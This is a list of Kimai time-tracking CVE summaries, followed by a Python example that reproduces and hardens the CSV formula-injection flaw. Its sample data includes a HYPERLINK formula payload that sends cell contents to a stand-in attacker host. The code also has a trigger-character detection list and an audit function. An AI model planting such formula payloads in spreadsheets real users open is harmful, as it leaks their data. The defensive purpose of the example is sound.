CVE-2024-4596
- EPSS 0.79%
- Published 2024-05-07 16:15:08
- Last modified 2025-10-10 18:16:29
A vulnerability was found in Kimai up to 2.15.0 and classified as problematic. An unspecified part of the Session Handler component is affected. Manipulation of the PHPSESSIONID argument leads to information disclosure. The a...
CVE-2024-29200
- EPSS 0.64%
- Published 2024-03-28 14:15:14
- Last modified 2025-10-10 17:30:34
Kimai is a web-based multi-user time-tracking application. The permission `view_other_timesheet` is enforced differently in the Kimai UI and in the API, so the API returns data that the UI would not show. When setting the `view_other_timesheet` permission to ...
CVE-2023-46245
- EPSS 1.47%
- Published 2023-10-31 16:15:09
- Last modified 2024-11-21 08:28:09
Kimai is a web-based multi-user time-tracking application. Versions prior to 2.1.0 are vulnerable to a Server-Side Template Injection (SSTI) which can be escalated to Remote Code Execution (RCE). The vulnerability arises when a malicious user uploads...
CVE-2020-19825
- EPSS 0.7%
- Published 2023-02-15 22:15:10
- Last modified 2025-03-19 19:15:37
Cross-Site Scripting (XSS) vulnerability in kevinpapst kimai2 1.30.0 in /src/Twig/Runtime/MarkdownExtension.php allows attackers to gain escalated privileges.
CVE-2021-43515
- EPSS 1%
- Published 2022-04-08 17:15:08
- Last modified 2024-11-21 06:29:20
CSV Injection (aka Excel Macro Injection or Formula Injection) exists when creating a new timesheet in Kimai. A malicious payload placed in the Description field is written unescaped when the timesheet is exported to a CSV file, so a spreadsheet application opening that export may evaluate it as a formula.
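The export path behind CVE-2021-43515 is easy to reproduce and to harden, so the following is an added example, not Kimai's own code (Kimai is PHP; this is a language-neutral illustration written in Python). The rows, column names and the `=HYPERLINK(...)` payload are constructed for the example; the trigger-character list and the single-quote prefix follow the OWASP CSV injection guidance. `export_timesheet_csv(..., hardened=False)` reproduces the vulnerable behaviour, the default neutralises formula-like cells, and `injected_cells` audits an existing export for cells a spreadsheet would evaluate.

```python
import csv
import io

# First characters that make Excel / LibreOffice Calc treat a cell as a
# formula. Tab and CR are included because some importers let them break
# out of a quoted cell. (List follows the OWASP CSV injection guidance.)
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample rows in the shape of a timesheet export:
# (user, project, duration in seconds, description). The third description
# is an example payload of the kind the advisory describes, not a string
# taken from the advisory itself. The second is a legitimate description
# that also starts with a trigger character, which shows the false-positive
# cost of the mitigation.
SAMPLE_ROWS = [
    ("alice", "Website", 3600, "Fixed login bug"),
    ("bob", "Website", 1800, "-0.5 hours of pairing"),
    ("mallory", "Website", 60,
     '=HYPERLINK("http://attacker.example/?"&A1,"click")'),
]


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would interpret the cell as a formula.

    The stripped form is also checked because some importers trim leading
    whitespace before deciding whether a cell is a formula (assumption made
    here as defence in depth, not a claim about any particular product).
    """
    if not value:
        return False
    return (value.startswith(FORMULA_TRIGGERS)
            or value.lstrip().startswith(FORMULA_TRIGGERS))


def csv_safe_cell(value) -> str:
    """Neutralise a cell so it is displayed as text, never evaluated.

    Mitigation: prefix formula-like cells with a single quote (the OWASP
    recommendation); spreadsheet applications then show the literal text.
    Non-string values such as the duration are exported unchanged.
    """
    if not isinstance(value, str):
        return str(value)
    if is_formula_like(value):
        return "'" + value
    return value


def export_timesheet_csv(rows, hardened: bool = True) -> str:
    """Serialise rows to CSV text.

    hardened=False reproduces the vulnerable behaviour: user-controlled
    description text goes straight into the file.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["user", "project", "duration", "description"])
    for row in rows:
        writer.writerow([csv_safe_cell(c) if hardened else c for c in row])
    return buf.getvalue()


def injected_cells(csv_text: str):
    """Audit an existing export and return (row, column, value) for every
    cell a spreadsheet would evaluate as a formula. Row 0 is the header."""
    found = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                found.append((r, c, cell))
    return found


if __name__ == "__main__":
    vulnerable = export_timesheet_csv(SAMPLE_ROWS, hardened=False)
    print("cells a spreadsheet would evaluate in the unescaped export:")
    for r, c, cell in injected_cells(vulnerable):
        print(f"  row {r}, column {c}: {cell!r}")
    print("hardened export:")
    print(export_timesheet_csv(SAMPLE_ROWS))
```

The single-quote prefix is visible to users who open the file in a spreadsheet, which is the trade-off for a mitigation that works regardless of the consuming application; an alternative is to keep the export unchanged and sanitise only at import time, but an exporter cannot rely on every downstream tool doing that.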